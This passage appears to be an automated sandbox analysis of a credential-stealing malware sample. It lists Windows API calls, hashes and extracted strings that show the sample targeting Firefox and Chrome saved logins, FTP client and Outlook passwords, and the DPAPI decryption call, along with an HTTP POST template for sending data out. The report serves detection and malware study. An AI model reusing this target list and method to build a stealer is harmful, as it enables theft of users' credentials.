                                                • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 00404531
                                                • CheckTokenMembership.ADVAPI32(00000000,?,00000000), ref: 0040454D
                                                • FreeSid.ADVAPI32(?), ref: 00404561
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2198539250.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000005.00000002.2198491316.0000000000400000.00000040.00000400.00020000.00000000.sdmp
                                                • Associated: 00000005.00000002.2198847156.0000000000413000.00000002.00000400.00020000.00000000.sdmp
                                                • Associated: 00000005.00000002.2198881241.0000000000414000.00000004.00000400.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_400000_SGS.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: AllocateCheckFreeInitializeMembershipToken
                                                • String ID:
                                                • API String ID: 3429775523-0
                                                • Opcode ID: 215ca8e38a4b271ad3cee58523825795728ac6a35de670ecaf2f6a1a604882c9
                                                • Instruction ID: e42ff38ce7fd43cd37d3952dc6f34b3e9485a0eb1960dbb1a6bbd8e72996f532
                                                • Opcode Fuzzy Hash: 215ca8e38a4b271ad3cee58523825795728ac6a35de670ecaf2f6a1a604882c9
                                                • Instruction Fuzzy Hash: AA114470504249EEEB11CB94DC1DB9EBBF4AB50309F05C0B5D154AB2E1D3B9E908C7AA
                                                APIs
                                                • CryptUnprotectData.CRYPT32(00000000,00000000,00000000,00000000,00000000,00000001,?), ref: 00404428
                                                • LocalFree.KERNEL32(00000000), ref: 0040445C
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2198539250.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000005.00000002.2198491316.0000000000400000.00000040.00000400.00020000.00000000.sdmp
                                                • Associated: 00000005.00000002.2198847156.0000000000413000.00000002.00000400.00020000.00000000.sdmp
                                                • Associated: 00000005.00000002.2198881241.0000000000414000.00000004.00000400.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_400000_SGS.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: CryptDataFreeLocalUnprotect
                                                • String ID:
                                                • API String ID: 1561624719-0
                                                • Opcode ID: 6e74fe00b55e7932f4a8f56ddd37455bc0ab8baf8583fb2bef727fa63ab50fae
                                                • Instruction ID: d6296d7f62e99f81d38af1605d697d2135ce95648fdc9c4461f15ac0c6790018
                                                • Opcode Fuzzy Hash: 6e74fe00b55e7932f4a8f56ddd37455bc0ab8baf8583fb2bef727fa63ab50fae
                                                • Instruction Fuzzy Hash: 0C112875A00218EBDF118E94DC44BDEBB74FB84361F448466FA21662D0C378AA40CB49
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2198539250.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000005.00000002.2198491316.0000000000400000.00000040.00000400.00020000.00000000.sdmp
                                                • Associated: 00000005.00000002.2198847156.0000000000413000.00000002.00000400.00020000.00000000.sdmp
                                                • Associated: 00000005.00000002.2198881241.0000000000414000.00000004.00000400.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_400000_SGS.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID: #2c$#2d$#2e$---$ftp.$ftp://$http://$https://
                                                • API String ID: 0-1526611526
                                                • Opcode ID: 1d281aee4272f9250f400c3888ae49f761eed4e7aebebf42cb24ce9bc7f8b5b7
                                                • Instruction ID: 8ada1e9ecac2b6a16ee08af0ca764310d7711adbc3e5f5be3c6fd46ad6a69e20
                                                • Opcode Fuzzy Hash: 1d281aee4272f9250f400c3888ae49f761eed4e7aebebf42cb24ce9bc7f8b5b7
                                                • Instruction Fuzzy Hash: 6F912571910209EADF11AFA1CC46BEEBEB5AF44308F20443BF011722E2DBB94D91DB59
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2198539250.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000005.00000002.2198491316.0000000000400000.00000040.00000400.00020000.00000000.sdmp
                                                • Associated: 00000005.00000002.2198847156.0000000000413000.00000002.00000400.00020000.00000000.sdmp
                                                • Associated: 00000005.00000002.2198881241.0000000000414000.00000004.00000400.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_400000_SGS.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID: SELECT hostname, encryptedUsername, encryptedPassword FROM moz_logins$ftp.$ftp://$http://$https://$mozsqlite3.dll$sqlite3.dll
                                                • API String ID: 0-3560805513
                                                • Opcode ID: 827d12ebccb40a3908b23ec9125f8cb4cad4b81e66f4b2e1889284962ec50f8b
                                                • Instruction ID: 0b43bc70ff64a1734e0ce49f563043eae91eb0b2240d540db883058d32c88b0f
                                                • Opcode Fuzzy Hash: 827d12ebccb40a3908b23ec9125f8cb4cad4b81e66f4b2e1889284962ec50f8b
                                                • Instruction Fuzzy Hash: 02512870900109BADF11AFA1CD06AEE7F75AB54349F10443BB512B01E3D7B98EA1EA5D
                                                APIs
                                                  • Part of subcall function 004018CF: LocalAlloc.KERNEL32(00000040,0040242B,?,004024AB,?), ref: 004018DD
                                                • wsprintfA.USER32 ref: 0040ACAA
                                                • wsprintfA.USER32 ref: 0040ACBD
                                                • wsprintfA.USER32 ref: 0040ACD0
                                                • wsprintfA.USER32 ref: 0040ACE3
                                                • wsprintfA.USER32 ref: 0040ACF6
                                                • wsprintfA.USER32 ref: 0040AD09
                                                • wsprintfA.USER32 ref: 0040AD1C
                                                  • Part of subcall function 0040AB24: lstrlen.KERNEL32(?), ref: 0040AB39
                                                  • Part of subcall function 0040AB24: CryptUnprotectData.CRYPT32(00000000,00000000,00000000,00000000,00000000,00000001,?), ref: 0040ABF1
                                                  • Part of subcall function 0040AB24: LocalFree.KERNEL32(00000000), ref: 0040AC24
                                                  • Part of subcall function 004015CB: lstrlen.KERNEL32(00000000), ref: 004015D7
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2198539250.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000005.00000002.2198491316.0000000000400000.00000040.00000400.00020000.00000000.sdmp
                                                • Associated: 00000005.00000002.2198847156.0000000000413000.00000002.00000400.00020000.00000000.sdmp
                                                • Associated: 00000005.00000002.2198881241.0000000000414000.00000004.00000400.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_400000_SGS.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: wsprintf$Locallstrlen$AllocCryptDataFreeUnprotect
                                                • String ID: %s\Keychain$SiteServer %d-User$SiteServer %d-User PW$SiteServer %d\Host$SiteServer %d\Remote Directory$SiteServer %d\SFTP$SiteServer %d\WebUrl
                                                • API String ID: 3846021373-1012938452
                                                • Opcode ID: e4f09ba1ab378aa8aa4d5a9de2269ea1075cbbd443485da2b849f4e7a922d2f4
                                                • Instruction ID: 1bba98e3d6ebe3bfaf8854b06724a853d0d9b8747224fc931b02987156b93079
                                                • Opcode Fuzzy Hash: e4f09ba1ab378aa8aa4d5a9de2269ea1075cbbd443485da2b849f4e7a922d2f4
                                                • Instruction Fuzzy Hash: 6861B532940208BAEF127FA1DC42EEDBA72AF04344F14853AF914741F1D77A5AA4EB59
                                                APIs
                                                  • Part of subcall function 0040A2A9: WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,000003FF,00000000,00000000), ref: 0040A2E2
                                                  • Part of subcall function 0040A2A9: CoTaskMemFree.OLE32(?,00000000,00000000,?,000000FF,?,000003FF,00000000,00000000), ref: 0040A2EB
                                                  • Part of subcall function 0040A2F4: WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,000003FF,00000000,00000000), ref: 0040A330
                                                  • Part of subcall function 0040A2F4: CoTaskMemFree.OLE32(?,00000000,00000000,?,000000FF,?,000003FF,00000000,00000000), ref: 0040A339
                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,000003FF,00000000,00000000), ref: 0040F58E
                                                • lstrcmpiA.KERNEL32(?,identification), ref: 0040F60E
                                                • lstrcmpiA.KERNEL32(?,identitymgr), ref: 0040F623
                                                • lstrcmpiA.KERNEL32(?,inetcomm server passwords), ref: 0040F646
                                                • lstrcmpiA.KERNEL32(?,outlook account manager passwords), ref: 0040F665
                                                • lstrcmpiA.KERNEL32(?,identities), ref: 0040F684
                                                • CoTaskMemFree.OLE32(00000000,?,inetcomm server passwords,?,identification), ref: 0040F6E5
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2198539250.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000005.00000002.2198491316.0000000000400000.00000040.00000400.00020000.00000000.sdmp
                                                • Associated: 00000005.00000002.2198847156.0000000000413000.00000002.00000400.00020000.00000000.sdmp
                                                • Associated: 00000005.00000002.2198881241.0000000000414000.00000004.00000400.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_400000_SGS.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: lstrcmpi$ByteCharFreeMultiTaskWide
                                                • String ID: identification$identities$identitymgr$inetcomm server passwords$outlook account manager passwords
                                                • API String ID: 636431001-4287852900
                                                • Opcode ID: 1ce6b7ace68d01d369585ed74b018ba19da90517791f3557c33866cb3dfc0c10
                                                • Instruction ID: 5defee22b8e27fb871682b6a3356ac2aeb954d56b4ddb1cb6db0f340d7122943
                                                • Opcode Fuzzy Hash: 1ce6b7ace68d01d369585ed74b018ba19da90517791f3557c33866cb3dfc0c10
                                                • Instruction Fuzzy Hash: FF416F7180021DABEF219F50CD41FDA7779BF05304F0045B6B604751E2DBB99AE99F98
                                                APIs
                                                • StrStrIA.SHLWAPI(?,explorer.exe,00000002,00000000), ref: 00402D7B
                                                • ProcessIdToSessionId.KERNEL32(?,00000000,?,explorer.exe,?,explorer.exe,00000002,00000000), ref: 00402D9F
                                                • OpenProcess.KERNEL32(02000000,00000000,?), ref: 00402DC9
                                                • OpenProcessToken.ADVAPI32(?,000201EB,?,02000000,00000000,?), ref: 00402DE1
                                                • ImpersonateLoggedOnUser.ADVAPI32(?), ref: 00402DEE
                                                • RegOpenCurrentUser.ADVAPI32(000F003F,00000000), ref: 00402E0F
                                                • CloseHandle.KERNEL32(?), ref: 00402E34
                                                • CloseHandle.KERNEL32(?,?), ref: 00402E3C
                                                • CloseHandle.KERNEL32(?), ref: 00402E46
                                                • Process32Next.KERNEL32(?,00000128), ref: 00402E58
                                                • CloseHandle.KERNEL32(?,00000002,00000000), ref: 00402E68
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2198539250.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000005.00000002.2198491316.0000000000400000.00000040.00000400.00020000.00000000.sdmp
                                                • Associated: 00000005.00000002.2198847156.0000000000413000.00000002.00000400.00020000.00000000.sdmp
                                                • Associated: 00000005.00000002.2198881241.0000000000414000.00000004.00000400.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_400000_SGS.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: CloseHandle$OpenProcess$User$CurrentImpersonateLoggedNextProcess32SessionToken
                                                • String ID: explorer.exe
                                                • API String ID: 3144406365-3187896405
                                                • Opcode ID: 49e4cd7d7ed3542de117e9f293d799c5d97a6a6d7919811d6a423e5cfa3976f1
                                                • Instruction ID: 32ad39438d36eb2c4f1d55e69c665a30fc6644003667a0189b3d930331164acb
                                                • Opcode Fuzzy Hash: 49e4cd7d7ed3542de117e9f293d799c5d97a6a6d7919811d6a423e5cfa3976f1
                                                • Instruction Fuzzy Hash: 8F210031940118AADF219B61DD49BEEB7B4AB08344F1044F6E209B11E0DBB89FC5DF99
                                                APIs
                                                  • Part of subcall function 004028FE: lstrlen.KERNEL32(?), ref: 00402932
                                                • StrStrIA.SHLWAPI(?,004164C1), ref: 0040BA50
                                                • lstrcmpiA.KERNEL32(CONSTRAINT,?), ref: 0040BA72
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2198539250.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000005.00000002.2198491316.0000000000400000.00000040.00000400.00020000.00000000.sdmp
                                                • Associated: 00000005.00000002.2198847156.0000000000413000.00000002.00000400.00020000.00000000.sdmp
                                                • Associated: 00000005.00000002.2198881241.0000000000414000.00000004.00000400.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_400000_SGS.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: lstrcmpilstrlen
                                                • String ID: CONSTRAINT$origin_url$password_value$username_value
                                                • API String ID: 3649823140-2401479949
                                                • Opcode ID: 500035ece04242e1ae96020af6f937db67946e234e9f7a9da2f3ebc026f93c9e
                                                • Instruction ID: a2f71f728c42a4325fa4d28dd5602d5680443d2fae4c4e77b8657f15ca9af250
                                                • Opcode Fuzzy Hash: 500035ece04242e1ae96020af6f937db67946e234e9f7a9da2f3ebc026f93c9e
                                                • Instruction Fuzzy Hash: 9C111276310109B9CF116F25EC029DE7F91EB51398B008136F819A51E2D7F9DAE1AB9C
                                                APIs
                                                  • Part of subcall function 004018CF: LocalAlloc.KERNEL32(00000040,0040242B,?,004024AB,?), ref: 004018DD
                                                • InternetCrackUrlA.WININET(?,00000000,80000000,0000003C), ref: 00403E58
                                                • InternetCreateUrlA.WININET(0000003C,80000000,?,00000FFF), ref: 00403E83
                                                • InternetCrackUrlA.WININET(?,00000000,00000000,0000003C), ref: 00403EC9
                                                • wsprintfA.USER32 ref: 00403EEE
                                                  • Part of subcall function 00403DB7: 6F0613D0.WSOCK32(?,0000FFFF,00000080,00000001,00000004), ref: 00403DDC
                                                • lstrlen.KERNEL32(?,00001000,00001000,00001000), ref: 00403F19
                                                • closesocket.WSOCK32(?,?,00001000,00001000,00001000), ref: 00403F64
                                                Strings
                                                • POST %s HTTP/1.0Host: %sAccept: */*Accept-Encoding: identity, *;q=0Content-Length: %luConnection: closeContent-Type: application/octet-streamContent-Encoding: binaryUser-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows 98), xrefs: 00403EE6
                                                • <, xrefs: 00403EA3
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2198539250.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000005.00000002.2198491316.0000000000400000.00000040.00000400.00020000.00000000.sdmp
                                                • Associated: 00000005.00000002.2198847156.0000000000413000.00000002.00000400.00020000.00000000.sdmp
                                                • Associated: 00000005.00000002.2198881241.0000000000414000.00000004.00000400.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_400000_SGS.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Internet$Crack$AllocCreateF0613Localclosesocketlstrlenwsprintf
                                                • String ID: <$POST %s HTTP/1.0Host: %sAccept: */*Accept-Encoding: identity, *;q=0Content-Length: %luConnection: closeContent-Type: application/octet-streamContent-Encoding: binaryUser-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)
                                                • API String ID: 1313980377-2005047030
                                                • Opcode ID: e8af38e846cf4d39388a8fcc6fea0907a77859fdb6d06ed6b1355339a6069a22
                                                • Instruction ID: a429c4077cf35c25440d6dd763033275fbd814fdd036323c4685f88714ea5c3a
                                                • Opcode Fuzzy Hash: e8af38e846cf4d39388a8fcc6fea0907a77859fdb6d06ed6b1355339a6069a22
                                                • Instruction Fuzzy Hash: 4C41F771D00209EAEF11AFE5CC41BEEBEB9EF08346F10803AF510B52A1D7B95A55DB19
                                                Similarity
                                                • API ID:
                                                • String ID: IsRelative$Path$Profile$profiles.ini
                                                • API String ID: 0-4107377610
                                                • Opcode ID: 2f39451c8eed89c1c4daeb202a394c86bc72f458fd4edabb682e8c06e2bd1776
                                                • Instruction ID: 5ee8cadbbd8b00acdf57b7c0c8cba141a4701fb156d17687039a110dfaec4fae
                                                • Instruction Fuzzy Hash: 97412C31A40146BADF227BA1DC02EAE7F72AF51314F14457BB510741E2DBBE9E90AB09
                                                APIs
                                                  • Part of subcall function 004018CF: LocalAlloc.KERNEL32(00000040,0040242B,?,004024AB,?), ref: 004018DD
                                                • StrStrIA.SHLWAPI(?,Content-Length:), ref: 00403B00
                                                • lstrlen.KERNEL32(Content-Length:,00000000,?,Content-Length:), ref: 00403B11
                                                • StrToIntA.SHLWAPI(00000001,00000001,00000000,Content-Length:,00000000,?,Content-Length:), ref: 00403B32
                                                • StrStrIA.SHLWAPI(?,Location:,?,Content-Length:), ref: 00403B49
                                                • lstrlen.KERNEL32(Location:,00000000,?,Location:,?,Content-Length:), ref: 00403B5A
                                                Similarity
                                                • API ID: lstrlen$AllocLocal
                                                • String ID: Content-Length:$Location:
                                                • API String ID: 2140729754-2400408565
                                                • Opcode ID: ab74e394f7b4ed77bf4176948ba239d95289de72329f0c94484bdd459f283391
                                                • Instruction ID: 887c3a052e585dbf08982f6133b0250286a7e5dbb1d34c025ab1b04810de1b55
                                                • Instruction Fuzzy Hash: 9541D731A04249BBDB10AFA5CC45F9DFF79EF80309F208177B510B52D1C7799A51DA54
                                                APIs
                                                • GetModuleHandleA.KERNEL32(kernel32.dll), ref: 00404478
                                                • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 00404490
                                                • GetProcAddress.KERNEL32(00000000,IsWow64Process), ref: 004044A1
                                                • GetCurrentProcess.KERNEL32(00000000,00000000,IsWow64Process,00000000,GetNativeSystemInfo,kernel32.dll), ref: 004044B0
                                                Similarity
                                                • API ID: AddressProc$CurrentHandleModuleProcess
                                                • String ID: GetNativeSystemInfo$IsWow64Process$kernel32.dll
                                                • API String ID: 977827838-3073145729
                                                • Opcode ID: 52fa25a1187148b6aa2af6f699f797c343cf269405537120f34093dc550733a4
                                                • Instruction ID: b4fabcce51f297447bc7e22879592c7cf0400204f4cc9062f02e0cb4fe293c57
                                                • Instruction Fuzzy Hash: C4F0547271020466C710B2B96C45BDF269887C03A6F290A37F105F22C1E9FCDD858278
                                                Similarity
                                                • API ID:
                                                • String ID: <setting name="$value="
                                                • API String ID: 0-3468128162
                                                • Opcode ID: 12a4b97974795b937dbac86db911079b7e305fb6aa103b601be57af741cbcaae
                                                • Instruction ID: 73fa1e58b4d6e0f5acaca6cd35f95d233c17529f6f8bb818b449ef047748446b
                                                • Instruction Fuzzy Hash: B0319272D0425A9ECF11BBE58C419EEBFB19F15318F1440B7E450B2291D6B84A84D7A9
                                                APIs
                                                • StrStrIA.SHLWAPI(00704138,FTPCON), ref: 0040819B
                                                • StrStrIA.SHLWAPI(00704458,FTP CONTROL,00000000,00704138,FTPCON), ref: 004081A7
                                                Similarity
                                                • API ID:
                                                • String ID: .prf$8Ap$FTP CONTROL$FTPCON$XDp$\Profiles
                                                • API String ID: 0-1674780894
                                                • Opcode ID: 66341082fae2bfb1c9b7f3338323273fc761d7cc8eea500390e92a08a407ca7d
                                                • Instruction ID: 25b8ca94bf750d55a6aec51c2f4f4f00567277a79abcf93635d07a7db2700455
                                                • Instruction Fuzzy Hash: A8018070600205BADB127A259D02FDF7A59DF81314F34413BB995791E2EA7C5A8292AC
                                                APIs
                                                • StrStrIA.SHLWAPI(00704458,FTP Navigator), ref: 00405BEE
                                                • StrStrIA.SHLWAPI(00704458,FTP Commander,00704458,FTP Navigator), ref: 00405C1C
                                                  • Part of subcall function 0040242B: lstrlen.KERNEL32(?), ref: 0040243F
                                                  • Part of subcall function 0040242B: StrStrIA.SHLWAPI(00000000,.exe,?), ref: 0040245E
                                                  • Part of subcall function 0040242B: StrRChrIA.SHLWAPI(00000000,00000000,0000005C,00000000,.exe,?), ref: 00402470
                                                  • Part of subcall function 0040242B: lstrlen.KERNEL32(00000000,00000000,00000000,0000005C,00000000,.exe,?), ref: 00402482
                                                  • Part of subcall function 004018B8: LocalFree.KERNEL32(00000000,?,004024D2,?,?,?,?,?,?), ref: 004018C4
                                                Similarity
                                                • API ID: lstrlen$FreeLocal
                                                • String ID: 8Ap$FTP Commander$FTP Navigator$XDp$ftplist.txt
                                                • API String ID: 1884169789-563579026
                                                • Opcode ID: d501a6024a88707594d1eb9d2829bcb1643201a2086780d712ba321ce2283e76
                                                • Instruction ID: 36e39a21a9329dbe8d23580b16dfc1acef3c6298e5863b6ab1a3678991a917a5
                                                • Instruction Fuzzy Hash: 1401C870504511FAEB1136228C02FEF3E5ADB82354F24413BB854751E6D77C5FC29AAC
                                                APIs
                                                • ExitProcess.KERNEL32(?,80000000,00000003,00000000,00000003,00000000,00000000), ref: 0040201E
                                                • GetFileSize.KERNEL32(00000001,00000000,?,80000000,00000003,00000000,00000003,00000000,00000000), ref: 0040202B
                                                • CreateFileMappingA.KERNEL32(?,00000000,00000002,00000000,00000000,00000000), ref: 0040203F
                                                • MapViewOfFile.KERNEL32(00000000,00000004,00000000,00000000,00000000,00000001,00000000,?,80000000,00000003,00000000,00000003,00000000,00000000), ref: 00402054
                                                • CloseHandle.KERNEL32(?,00000000,00000004,00000000,00000000,00000000,00000001,00000000,?,80000000,00000003,00000000,00000003,00000000,00000000), ref: 00402063
                                                • CloseHandle.KERNEL32(?,?,00000000,00000004,00000000,00000000,00000000,00000001,00000000,?,80000000,00000003,00000000,00000003,00000000,00000000), ref: 0040206A
                                                • CloseHandle.KERNEL32(?,00000001,00000000,?,80000000,00000003,00000000,00000003,00000000,00000000), ref: 00402079
                                                Similarity
                                                • API ID: CloseFileHandle$CreateExitMappingProcessSizeView
                                                • String ID:
                                                • API String ID: 3150701006-0
                                                • Opcode ID: daaf07374e8540c6cdb5df11b3425a20ea5e07ebc92b28c0fedbe5a698556156
                                                • Instruction ID: d399f326a401a41e3911470efd7f2dd0ea8cd6c92bc63ed3790d9b1a64691747
                                                • Instruction Fuzzy Hash: DD114070680301B7EF312F71CC87F553A94AB41B58F20816677547D1D6DAF998A0861C
                                                Similarity
                                                • API ID:
                                                • String ID: ftp://$http://$https://
                                                • API String ID: 0-2804853444
                                                • Opcode ID: 85a20b7f940cd11f371e229cab775ce235b8a0384adc6a49feb18a3ae16c6eca
                                                • Instruction ID: 81f334c42a3cb0fc056165a4037353c858dea4867f82d2d186d61bdc58b91dcb
                                                • Instruction Fuzzy Hash: 2E61F872800109FEDF11AF91CD45AEEBBB9EB04348F10807BB841B51A1DB798B95DB98
                                                Similarity
                                                • API ID:
                                                • String ID: "/>$winex="
                                                • API String ID: 0-1498080979
                                                • Opcode ID: ee3a9678dbcfc644506b129ddf0c60544aeca980f19c114f9fc06e692d1e46ee
                                                • Instruction ID: a65735a88df2e3c906ae4414ece12a79dd6024024b2867e7669953596bd514cb
                                                • Instruction Fuzzy Hash: 43313E3290401ABEDF12ABA2CC02DEE7E76AF44344F10483BF501B51F1D7798A61EB99
                                                APIs
                                                • StrStrIA.SHLWAPI(00704138,FTPNow), ref: 0040D017
                                                • StrStrIA.SHLWAPI(00704138,FTP Now,00704138,FTPNow), ref: 0040D028
                                                Similarity
                                                • API ID:
                                                • String ID: 8Ap$FTP Now$FTPNow$sites.xml
                                                • API String ID: 0-1978225022
                                                • Opcode ID: fe4c2ac575d338e4399085464dc42a8b401bee19fcd63c00be131e2c53f39f8e
                                                • Instruction ID: ec990e8c8fde0540a055802f0a5bafa42fe6efae90b5ffc829ae8747faa2dcf0
                                                • Instruction Fuzzy Hash: 04F08670900101B5DB3136758C42FAF3A999B8275CF14413BB928B11E6E6BCCEC692AD
                                                APIs
                                                • lstrlen.KERNEL32(?), ref: 00401E6D
                                                • lstrlen.KERNEL32(00000000,?), ref: 00401E77
                                                • lstrcpy.KERNEL32(00000000,?), ref: 00401E8B
                                                • lstrcat.KERNEL32(00000000,00000000), ref: 00401E94
                                                Similarity
                                                • API ID: lstrlen$lstrcatlstrcpy
                                                • String ID: GHA$GHA
                                                • API String ID: 2414487701-4188437078
                                                • Opcode ID: 4a2ac044a1f3ec6f3ac2d9ab5d43939d70f26caacab916fba1e10c06da4c4d4e
                                                • Instruction ID: d9246f528be96856b322303a71286aa71aff6bea291017c40e37798af4e07103
                                                • Instruction Fuzzy Hash: DAF03A75500208BEDF013F62CC85ADD3A9AEB50358F00C53BB8192A262D7BD8AD48B88
                                                APIs
                                                • GetHGlobalFromStream.OLE32(?,?), ref: 00401A3A
                                                • GlobalLock.KERNEL32(?), ref: 00401A55
                                                  • Part of subcall function 004018CF: LocalAlloc.KERNEL32(00000040,0040242B,?,004024AB,?), ref: 004018DD
                                                • GlobalUnlock.KERNEL32(?), ref: 00401A7D
                                                • lstrlen.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 00401A85
                                                  • Part of subcall function 004018B8: LocalFree.KERNEL32(00000000,?,004024D2,?,?,?,?,?,?), ref: 004018C4
                                                Similarity
                                                • API ID: Global$Local$AllocFreeFromLockStreamUnlocklstrlen
                                                • String ID: CRYPTED0YUI1.0
                                                • API String ID: 4083238039-1217275205
                                                • Opcode ID: 545c777eb07fd0e7c0e595b1e3f55fc495aaecec74257f33e463e1684f6cb145
                                                • Instruction ID: 291b1819b17b0b52e8b302f92d65d305c822eefb8dbf6a76828d30f87d665d9c
                                                • Instruction Fuzzy Hash: A1118671D00108BADF026FA1CC429DD7F7AEF44348F008076B915B51B1D77A8AA5AB58
                                                APIs
                                                • GetHGlobalFromStream.OLE32(?,?,0040FB29), ref: 0040FB39
                                                • GlobalLock.KERNEL32(?), ref: 0040FB5A
                                                • GlobalUnlock.KERNEL32(?), ref: 0040FB72
                                                • StrStrIA.SHLWAPI(00000000,STATUS-IMPORT-OK,?,?,?,0040FB29), ref: 0040FB8D
                                                Similarity
                                                • API ID: Global$FromLockStreamUnlock
                                                • String ID: STATUS-IMPORT-OK
                                                • API String ID: 2287449323-1591331578
                                                • Opcode ID: 346b4dea8ef0dae1f6fdfc22f3f8325ca76037283ec6642742aa729caa4fbcc9
                                                • Instruction ID: 90cea658c6c8212aa9fef009ba96f0a063fbcad0abcecaf4235fdd33f3ce5274
                                                • Instruction Fuzzy Hash: B0012135D04208BADF127BB2CC429AD7B79EB01348F504177B550B11A2DBBA9E949B58
                                                APIs
                                                  • Part of subcall function 00401DF8: lstrlen.KERNEL32(?), ref: 00401E19
                                                  • Part of subcall function 00401DF8: lstrlen.KERNEL32(00000000,?), ref: 00401E23
                                                  • Part of subcall function 00401DF8: lstrcpy.KERNEL32(00000000,?), ref: 00401E37
                                                  • Part of subcall function 00401DF8: lstrcat.KERNEL32(00000000,00000000), ref: 00401E40
                                                • lstrlen.KERNEL32(?), ref: 0040243F
                                                • StrStrIA.SHLWAPI(00000000,.exe,?), ref: 0040245E
                                                • StrRChrIA.SHLWAPI(00000000,00000000,0000005C,00000000,.exe,?), ref: 00402470
                                                • lstrlen.KERNEL32(00000000,00000000,00000000,0000005C,00000000,.exe,?), ref: 00402482
                                                Similarity
                                                • API ID: lstrlen$lstrcatlstrcpy
                                                • String ID: .exe
                                                • API String ID: 2414487701-4119554291
                                                • Opcode ID: b3ab67e4c25ae85d73d89bbcc7baa1674134501c8b04b5abb503f5a19a2c8901
                                                • Instruction ID: f255478a9709c47b6028815859772bdce8d28858f668d5172353d83d27d3e8c2
                                                • Opcode Fuzzy Hash: b3ab67e4c25ae85d73d89bbcc7baa1674134501c8b04b5abb503f5a19a2c8901
                                                • Instruction Fuzzy Hash: F4F0C83120429269DB2132268C09F6F6F859B92744F14003BF640B72D3D7FC989297BE
                                                Similarity
                                                • API ID:
                                                • String ID: <POP3_Password2
                                                • API String ID: 0-2923094552
                                                • Opcode ID: 97ee5e5c3115971875eaef779bf3ad8748e7c7dee18b90b3a614ebe06c78d45e
                                                • Instruction ID: 81c7923d4842b803ad45ce7413c013c6613b7a06965b9ff00af2c8356a2977a1
                                                • Opcode Fuzzy Hash: 97ee5e5c3115971875eaef779bf3ad8748e7c7dee18b90b3a614ebe06c78d45e
                                                • Instruction Fuzzy Hash: 7C416031900019BEDF12ABA2DC01CEEBE76EF58354B144837F501B61A1D77A4E61EBA9
                                                APIs
                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000001,00000000,00000000,00000000,00000000,?), ref: 0040CD9B
                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000001,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000001,00000000,00000000,00000000), ref: 0040CDC1
                                                • StrStrIA.SHLWAPI(00000000,00000000,00000000,00000000,00000000,00000001,00000000,00000000,00000000,00000000,?), ref: 0040CDE5
                                                • lstrlen.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000001,00000000,00000000,00000000,00000000,?), ref: 0040CE07
                                                  • Part of subcall function 004018B8: LocalFree.KERNEL32(00000000,?,004024D2,?,?,?,?,?,?), ref: 004018C4
                                                • lstrlen.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000001,00000000,00000000,00000000,00000000,?), ref: 0040CDF2
                                                  • Part of subcall function 004018CF: LocalAlloc.KERNEL32(00000040,0040242B,?,004024AB,?), ref: 004018DD
                                                Similarity
                                                • API ID: ByteCharLocalMultiWidelstrlen$AllocFree
                                                • String ID:
                                                • API String ID: 1890766102-0
